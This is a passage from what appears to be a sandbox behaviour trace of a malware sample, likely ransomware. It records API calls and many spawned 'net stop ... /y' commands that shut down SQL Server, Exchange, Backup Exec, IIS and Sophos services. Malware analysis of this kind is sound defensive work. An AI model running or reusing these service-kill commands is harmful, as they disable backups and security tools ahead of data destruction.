_String2="stop") returned -12 [0120.973] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.973] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.973] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.973] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.973] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.973] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.973] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.973] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.973] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.973] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.973] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.973] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.973] _wcsicmp (_String1="accounts", _String2="MSSQL$TPS") returned -12 [0120.973] _wcsicmp (_String1="computer", _String2="MSSQL$TPS") returned -10 [0120.973] _wcsicmp (_String1="config", _String2="MSSQL$TPS") returned -10 [0120.973] _wcsicmp (_String1="continue", _String2="MSSQL$TPS") returned -10 [0120.973] _wcsicmp (_String1="cont", _String2="MSSQL$TPS") returned -10 [0120.974] _wcsicmp (_String1="file", _String2="MSSQL$TPS") returned -7 [0120.974] _wcsicmp (_String1="files", _String2="MSSQL$TPS") returned -7 [0120.974] _wcsicmp (_String1="group", _String2="MSSQL$TPS") returned -6 [0120.974] _wcsicmp (_String1="groups", _String2="MSSQL$TPS") returned -6 [0120.974] _wcsicmp (_String1="help", _String2="MSSQL$TPS") returned -5 [0120.974] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPS") returned -5 [0120.974] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPS") returned -1 [0120.974] _wcsicmp (_String1="pause", _String2="MSSQL$TPS") returned 3 [0120.974] _wcsicmp (_String1="session", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="sessions", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="sess", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="share", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="start", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="stats", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="statistics", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="stop", _String2="MSSQL$TPS") returned 6 [0120.974] _wcsicmp (_String1="time", _String2="MSSQL$TPS") returned 7 [0120.974] _wcsicmp (_String1="user", _String2="MSSQL$TPS") returned 8 [0120.974] _wcsicmp (_String1="users", _String2="MSSQL$TPS") returned 8 [0120.974] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0120.974] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0120.974] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0120.974] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0120.974] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPS") returned 1 [0120.974] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0120.974] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0120.974] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0120.974] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0120.974] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0120.974] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0120.975] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0120.975] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0120.975] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0120.975] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0120.975] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0120.975] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0120.975] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0120.975] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0120.975] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0120.975] _wcsupr (in: _String="MSSQL$TPS" | out: _String="MSSQL$TPS") returned="MSSQL$TPS" [0120.975] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5c54a8 [0120.980] GetServiceKeyNameW (in: hSCManager=0x5c54a8, lpDisplayName="MSSQL$TPS", lpServiceName=0x39aaf0, lpcchBuffer=0x26f860 | out: lpServiceName="", lpcchBuffer=0x26f860) returned 0 [0120.981] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0120.981] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0120.981] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0120.981] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0120.981] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0120.981] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0120.981] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0120.981] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0120.981] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0120.981] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0120.981] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0120.981] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0120.981] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0120.981] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0120.981] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0120.981] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0120.981] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0120.981] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0120.981] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0120.982] NetServiceControl (in: servername=0x0, service="MSSQL$TPS", opcode=0x0, arg=0x0, bufptr=0x26f85c | out: bufptr=0x26f85c) returned 0x889 [0120.983] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.984] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.984] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.986] GetFileType (hFile=0x0) returned 0x0 [0120.986] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5c3ec0 [0120.986] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5c3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.986] WriteFile (in: hFile=0x0, lpBuffer=0x5c3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x26f79c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f79c, lpOverlapped=0x0) returned 0 [0120.986] LocalFree (hMem=0x5c3ec0) returned 0x0 [0120.986] GetFileType (hFile=0x0) returned 0x0 [0120.986] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0120.986] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0120.987] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f79c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f79c, lpOverlapped=0x0) returned 0 [0120.987] LocalFree (hMem=0x5c6170) returned 0x0 [0120.987] _ultow (in: _Dest=0x889, _Radix=2553804 | out: _Dest=0x889) returned="2185" [0120.987] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.987] GetFileType (hFile=0x0) returned 0x0 [0120.987] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5c6170 [0120.987] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5c6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.987] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x26f7a8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f7a8, lpOverlapped=0x0) returned 0 [0120.987] LocalFree (hMem=0x5c6170) returned 0x0 [0120.987] GetFileType (hFile=0x0) returned 0x0 [0120.987] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5c6170 [0120.987] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\\", lpUsedDefaultChar=0x0) returned 2 [0120.987] WriteFile (in: hFile=0x0, lpBuffer=0x5c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f7a8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x26f7a8, lpOverlapped=0x0) returned 0 [0120.987] LocalFree (hMem=0x5c6170) returned 0x0 [0120.988] NetApiBufferFree (Buffer=0x5c1ae0) returned 0x0 [0120.988] NetApiBufferFree (Buffer=0x5c1af8) returned 0x0 [0120.988] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0120.988] exit (_Code=2) Process: id = "220" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xce8000" os_pid = "0xffc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$CITRIX_METAFRAME /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 615 os_tid = 0xff4 Process: id = "221" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6bb09000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeES /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 616 os_tid = 0xe10 Process: id = "222" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5bf0e000" os_pid = "0xec4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop masvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 617 os_tid = 0xc88 Process: id = "223" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60213000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “SQLsafe Filter Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 618 os_tid = 0xd44 Process: id = "224" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60118000" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop RESvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 619 os_tid = 0x7c8 Process: id = "225" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5bf1d000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop W3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 620 os_tid = 0xb40 Process: id = "226" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e722000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSExchangeSRS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 621 os_tid = 0xe20 Process: id = "227" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5c327000" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecAgentAccelerator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 622 os_tid = 0xe44 Process: id = "228" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x7162c000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$ECWDB2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 623 os_tid = 0xd04 Process: id = "229" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6ae31000" os_pid = "0x644" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop audioendpointbuilder /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 624 os_tid = 0xc74 Process: id = "230" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x67a36000" os_pid = "0x3b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop “Sophos Safestore Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 625 os_tid = 0xd24 Process: id = "231" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60f3b000" os_pid = "0xeb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecAgentBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 626 os_tid = 0xd64 Process: id = "232" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5ba40000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$PRACTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 645 os_tid = 0xe7c Process: id = "233" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x62fd9000" os_pid = "0xdd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xedc" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 627 os_tid = 0xcd0 [0119.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffa64 | out: lpSystemTimeAsFileTime=0x2ffa64*(dwLowDateTime=0x1b1b5ed0, dwHighDateTime=0x1d6f0d1)) [0119.739] GetCurrentProcessId () returned 0xdd0 [0119.739] GetCurrentThreadId () returned 0xcd0 [0119.739] GetTickCount () returned 0x1151362 [0119.739] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffa5c | out: lpPerformanceCount=0x2ffa5c*=23883954581) returned 1 [0119.739] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.739] __set_app_type (_Type=0x1) [0119.739] __p__fmode () returned 0x770331f4 [0119.739] __p__commode () returned 0x770331fc [0119.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.740] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.740] GetConsoleOutputCP () returned 0x1b5 [0119.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.978] sprintf_s (in: _DstBuf=0x2ffa1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.978] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0119.980] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.980] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0119.980] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff7e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0119.980] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e3af8 [0119.981] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.981] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff9ec | out: Buffer=0x2ff9ec*=0x6e1b00) returned 0x0 [0119.981] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff9ec | out: Buffer=0x2ff9ec*=0x6e1b18) returned 0x0 [0119.981] _fileno (_File=0x77032900) returned -2 [0119.981] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0119.981] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.981] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.981] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.981] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.981] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.981] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.981] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.981] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.981] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.981] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.981] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.981] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.981] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.981] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.981] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.981] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.981] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.981] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.981] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.981] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.981] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.981] _wcsicmp (_String1="accounts", _String2="MSSQLServerOLAPService") returned -12 [0119.981] _wcsicmp (_String1="computer", _String2="MSSQLServerOLAPService") returned -10 [0119.982] _wcsicmp (_String1="config", _String2="MSSQLServerOLAPService") returned -10 [0119.982] _wcsicmp (_String1="continue", _String2="MSSQLServerOLAPService") returned -10 [0119.982] _wcsicmp (_String1="cont", _String2="MSSQLServerOLAPService") returned -10 [0119.982] _wcsicmp (_String1="file", _String2="MSSQLServerOLAPService") returned -7 [0119.982] _wcsicmp (_String1="files", _String2="MSSQLServerOLAPService") returned -7 [0119.982] _wcsicmp (_String1="group", _String2="MSSQLServerOLAPService") returned -6 